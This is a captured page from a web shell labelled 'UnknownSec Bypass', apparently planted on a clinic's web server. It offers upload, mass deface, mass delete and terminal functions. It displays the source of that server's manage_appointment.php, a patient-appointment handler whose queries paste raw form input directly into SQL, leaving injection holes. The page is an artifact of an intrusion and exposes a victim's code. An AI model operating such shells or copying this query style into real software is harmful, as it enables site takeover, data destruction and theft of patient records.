UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
manage_appointment.php
<?php require_once "config.php"; session_start(); $userid=$_SESSION['userid']; $presirname = $_POST['presirname']; $patientname = $_POST['patientname']; $mobileno = $_POST['mobileno']; $age = $_POST['age']; $ageinyear = $_POST['ageinyear']; $gender = $_POST['gender']; $dateofappointment = $_POST['dateofappointment']; $consultant = $_POST['consultant']; $patienttype = $_POST['patienttype']; $suhid = $_POST['suhid']; $uhid = $_POST['uhid']; $appid = $_POST['appid']; $btnopration = $_POST['btnopration']; $creationdatetime = date("Y-m-d H:m:s"); $message= ""; $appno=0; $cnt=""; $query = "select count(0) as count from appointmenttb where appdate='".$dateofappointment."' and consultantid='".$consultant."' and isdeleted='0'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $appno= $row["count"]+1; } if ($btnopration=="SaveAppointment") { if($patienttype=="Yes") { //get token $tokenno=0; $query = "select token from tokenregistertb where mobileno='".$mobileno."' and isdeleted=0"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $tokenno= $row["token"]; } $id =0; $query="INSERT INTO appointmenttb(regid,appno,presirname,name,age,ageinyear,gender,mobileno,appdate,consultantid,paymentstatus,NeworOld,isdeleted,creationdatetime,userid) VALUES('{$id}','{$appno}','{$presirname}','{$patientname}','{$age}','{$ageinyear}','{$gender}','{$mobileno}','{$dateofappointment}','{$consultant}',0,'{$patienttype}','0','{$creationdatetime}','{$userid}')"; $result = mysqli_query($conn, $query); if ($result==true) { $message="1"; } } else { $cnt=0; $query = "select count(0) as count from appointmenttb where uhid='".$uhid."' and appdate='".$dateofappointment."' and consultantid='".$consultant."' and isdeleted='0'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $cnt= $row["count"]; } if($cnt==0) { $regid=0; $tokenno=0; $query = "select token from tokenregistertb where mobileno='".$mobileno."' and isdeleted='0'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $tokenno= $row["token"]; } //update token $query="INSERT INTO appointmenttb(regid,uhid,appno,presirname,name,age,ageinyear,gender,mobileno,appdate,consultantid,paymentstatus,NeworOld,isdeleted,creationdatetime,userid) VALUES('{$regid}','{$uhid}','{$appno}','{$presirname}','{$patientname}','{$age}','{$ageinyear}','{$gender}','{$mobileno}','{$dateofappointment}','{$consultant}',0,'No','0','{$creationdatetime}','{$userid}')"; $result = mysqli_query($conn, $query); if ($result==true) { $message="1"; } } else { $message= "4"; } } } elseif ($btnopration=="UpdateAppointment") { } elseif ($btnopration=="Cancel Appointment") { $query="update appointmenttb set isdeleted=1 where appid='".$appid."'"; $result = mysqli_query($conn, $query); if ($result==true) { $message="2"; } } elseif ($btnopration=="Booked Appointment") { $query="update appointmenttb set isdeleted=0 where appid='".$appid."'"; $result = mysqli_query($conn, $query); if ($result==true) { $message="3"; } } echo json_encode($message); ?>
Copyright © 2025 - UnknownSec